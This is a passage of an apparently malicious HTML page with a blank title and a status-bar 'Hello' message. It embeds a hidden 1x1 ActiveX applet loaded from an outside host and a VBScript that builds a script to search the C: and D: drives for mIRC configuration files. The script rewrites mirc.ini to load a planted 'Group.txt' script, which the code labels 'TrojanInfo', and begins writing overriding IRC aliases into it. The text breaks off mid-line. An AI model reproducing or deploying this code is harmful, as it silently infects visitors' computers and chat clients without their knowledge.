<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=windows-1257" http-equiv=Content-Type>
<SCRIPT>
function hidestatus(){
window.status='-:[ .:||Hello||:. ]:-'
return true
}
if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)
document.onmouseover=hidestatus
document.onmouseout=hidestatus
</SCRIPT>

<META content="Microsoft FrontPage 4.0" name=GENERATOR>
<title></title>
</HEAD>
<BODY bgColor=#000000 
text=#0000ff>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<APPLET align=baseline 
code=com.ms.activeX.ActiveXComponent name=appl width="1" height="1"><PARAM NAME="align" VALUE="baseline"><PARAM NAME="code" VALUE="com.ms.activeX.ActiveXComponent"><PARAM NAME="name" VALUE="appl"><PARAM NAME="codeBase" VALUE="http://www.siti.hit.bg/"></APPLET>
<SCRIPT language=vbscript>
a=chr(34)
flc1="dim Otag "
flc2=""
flc3="dim Ttag "
flc4="dim DummyTag"
flc5="dim SectionDef"
flc6="call ShowFolderList("&a&"c:\"&a&")"
flc7="call ShowFolderList("&a&"d:\"&a&")"
flc8="sub ShowFolderList(s)"
flc9="on error resume next"
flc10="Set filesys = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
flc11="Set RootFolder1 = FileSys.GetFolder(s)"
flc12="Set SubFolds1 = RootFolder1.subfolders"
flc13="For Each f1 in Subfolds1"
flc14="s = f1.path & "&a&"\"&a&""
flc15="Otag = s & "&a&"mirc.ini"&a&""
flc16="DummyTag= "&a&"C:\winamod.dat"&a&""
flc17="TTag= s & "&a&"Group.txt"&a&""
flc18="SectionDef= "&a&"[rfiles]"&a&""
flc19="if filesys.fileexists(otag) then "
flc20="Call Filemod() "
flc21="filesys.CopyFile DummyTag, Otag, true"
flc22="Call ImplementRemote()"
flc23="filesys.CopyFile DummyTag, Otag, true"
flc24="Call ImplementWarn()"
flc25="filesys.CopyFile DummyTag, Otag, true"
flc26="Call ImplementFserv()"
flc27="filesys.CopyFile DummyTag, Otag, true"
flc28="call ImplementPerfCheck()"
flc29="filesys.CopyFile DummyTag, Otag, true"
flc30="Call ImplementPerform()"
flc31="'SetClearArchiveBit(Otag)"
flc32="End If"
flc33="Call ShowFolderList(s)"
flc34="Next"
flc35="End sub"
flc36="Function FiltNum(FilString)"
flc37="on error resume next"
flc38="countdown=5"
flc39="do"
flc40="Comp = mid(FilString,2,countdown)"
flc41="if isnumeric(Comp) then LastNum = Comp : exit do"
flc42="countdown=countdown-1"
flc43="loop until countdown =0"
flc44="FiltNum = LastNum"
flc45="end function"
flc46="Function LastLineNum(SSection)"
flc47="on error resume next"
flc48="Set FS1N = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
flc49="Set FR1N = FS1N.OpenTextFile(otag,1,true)"
flc50="Do While FR1N.AtEndOfStream <> True"
flc51="segment1 = FR1N.readline"
flc52="w = InstrRev(segment1,SSection)"
flc53="counts=counts+1"
flc54="if w > 0 then "
flc55="do"
flc56="if FR1N.AtEndOfStream = True then exit do"
flc57="segmentk = FR1N.readline"
flc58="k = InstrRev(segmentk,"&a&"n"&a&",1)		"
flc59="if k=1 then"
flc60="LastNum=FiltNum(segmentk)"
flc61="end if"
flc62="Loop until k=0"
flc63="end if"
flc64="loop"
flc65="FR1N.Close"
flc66="LastLineNum=LastNum"
flc67="end function"
flc68="Function Filemod()"
flc69="on error resume next"
flc70="Set fs1 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
flc71="Set fr1 = fs1.OpenTextFile(otag,1,true)"
flc72="Set fs2 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
flc73="Set fr2 = fs2.OpenTextFile(DummyTag,2,true)"
flc74="Do While fr1.AtEndOfStream <> True"
flc75="segment1 = fr1.readline"
flc76="fr2.writeline segment1"
flc77="w = InstrRev(segment1,"&a&"[rfiles]"&a&")"
flc78="counts=counts+1"
flc79="if w > 0 then "
flc80="counts2=counts"
flc81="do"
flc82="if fr1.AtEndOfStream = True then exit do"
flc83="segmentk = fr1.readline"
flc84="k = InstrRev(segmentk,"&a&"n"&a&",1)		"
flc85="if k=1 then"
flc86="LastNum=FiltNum(segmentk)"
flc87="fr2.writeline segmentk"
flc88="end if"
flc89="COUNTS2=COUNTS2+1"
flc90="Loop until k<>1"
flc91="exit do"
flc92="end if"
flc93="loop"
flc94="fr1.Close"
flc95="fr2.close"
flc96="Set fs3 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
flc97="Set fr3 = fs3.OpenTextFile(DummyTag,8,true)"
flc98="TrojanInfo = "&a&"n"&a&" & lastlinenum(SectionDef)+1 & "&a&"=Group.txt"&a&""
flc99="fr3.writeline TrojanInfo"
flc100="fr3.Close"
flc101="Set fs4 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
flc102="Set fr4 = fs4.OpenTextFile(Otag,1,true)"
flc103="Set fs5 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
flc104="Set fr5 = fs5.OpenTextFile(DummyTag,8,true)"
flc105="Do While fr4.AtEndOfStream <> True"
flc106="segment2 = fr4.readline"
flc107="if fr4.line >= counts2 + 2 then "
flc108="fr5.writeline segment2"
flc109="end if"
flc110="loop"
flc111="fr4.Close"
flc112="fr5.Close"
flc113="fs5.CopyFile DummyTag, Otag, true"
flc114="Call FLDL(TTag)"
flc115="end Function"
flc116="sub FLDL(TTag)"
flc117="on error resume next"
flc118="Set fs6 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
flc119="Set fr6 = fs6.OpenTextFile(TTag,2,true)"
flc120="fr6.writeline "&a&"alias whois {"&a&""
flc120_1="fr6.writeline "&a&"  if ($1 != $me) { whois $1 } "&a&""
flc121="fr6.writeline "&a&"  else halt"&a&""
flc122="fr6.writeline "&